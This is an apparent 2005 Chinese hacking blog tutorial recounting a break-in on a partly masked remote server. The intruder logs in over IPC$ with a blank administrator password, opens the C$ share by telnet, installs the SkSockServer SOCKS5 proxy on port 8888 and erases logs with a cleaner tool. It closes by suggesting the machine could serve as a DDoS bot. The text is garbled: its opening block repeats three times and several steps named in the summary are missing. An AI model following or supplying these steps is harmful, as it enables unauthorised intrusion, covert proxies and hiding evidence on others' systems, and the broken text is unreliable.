-
2005-09-23
一次详细全面的入侵报告
注: 肉鸡为你已经得到权限的计算机
跳板则是在肉鸡的基础上被你做过内容,以方便自已的计算机
肉鸡: 211.75.X.X
事情发现在一个深夜.外面黑的吓死人,只有我的房间还亮着灯,我穿着一件黑色的大T 恤
按照网站论坛上的提示,211.75.X.X的USER为administrato,PASSWD为空,方式IPC连接
习惯性的先PING了一下该网站
C:\>ping 211.75.X.X
Pinging iceblood.yofor.com [211.75.X.X] with 32 bytes of data:
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Ping statistics for 211.75.X.X:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in
milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
看来网站开通,那就按提示IPC连接吧
注: IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。注: 肉鸡为你已经得到权限的计算机
跳板则是在肉鸡的基础上被你做过内容,以方便自已的计算机
肉鸡: 211.75.X.X
事情发现在一个深夜.外面黑的吓死人,只有我的房间还亮着灯,我穿着一件黑色的大T 恤
按照网站论坛上的提示,211.75.X.X的USER为administrato,PASSWD为空,方式IPC连接
习惯性的先PING了一下该网站
C:\>ping 211.75.X.X
Pinging iceblood.yofor.com [211.75.X.X] with 32 bytes of data:
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Ping statistics for 211.75.X.X:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in
milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
看来网站开通,那就按提示IPC连接吧
注: IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。注: 肉鸡为你已经得到权限的计算机
跳板则是在肉鸡的基础上被你做过内容,以方便自已的计算机
肉鸡: 211.75.X.X
事情发现在一个深夜.外面黑的吓死人,只有我的房间还亮着灯,我穿着一件黑色的大T 恤
按照网站论坛上的提示,211.75.X.X的USER为administrato,PASSWD为空,方式IPC连接
习惯性的先PING了一下该网站
C:\>ping 211.75.X.X
Pinging iceblood.yofor.com [211.75.X.X] with 32 bytes of data:
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Ping statistics for 211.75.X.X:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in
milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
看来网站开通,那就按提示IPC连接吧
注: IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。telnet上去
TELNET 211.75.X.X
C:\WINNT\SYSTEM32\NET SHARE C$
这一条命令是开对方的共享,然后在本机上的开始运行中直接键入\\211.75.X.X就可以连上了,将SkSockServer拖到对方的C盘中就可以了.另外我们还可以利用流光的种植者直接种上去,也很简单
明白了吧
传上去后
c:\winnt\system32\sksockserver -install
开始安装SKSOCKSERVER
c:\winnt\system32\sksockserver -config starttype 2
c:\winnt\system32\sksockserver -config port 8888
c:\winnt\system32\net start skserver
这样我们就开启了一个端口为8888的SOCK5代理服务器,放在你的QQ上用吧
现在算来,该做的也差不多了,是到要走的时候了,清扫一下吧
这一步在这里比较简单了,推荐使用SSSO-Friend,一款图形界面的软件,他会帮你清掉你的PP,很简单
要的话联系我吧或是到down.chinaehacker.net下载
到这里教程也完了
总结一下,我们用了SQL,IPC,共享,开了99端口,23端口,3389端口,最后还做了一个SOCK5的代理服务器.其实运用上面的手法,你还可以做TFTP服务器,做成用于DDOS攻击的傀儡机器等等.没什么技术含量,只是想告诉各位一个最简单的道理,多看书,多运用,将本身不相关的东西相连起来,就会成为一个完整的圆.随机文章:
你BT我更BT!记一次入侵BT服务器 2005-10-15提防:网络安全中最薄弱的环节 2005-11-13操作中的安全性 2005-09-29安全性神话 2005-09-29当今热门黑客游戏 —— Hacker WarGames 简介 2005-09-27
收藏到:Del.icio.us





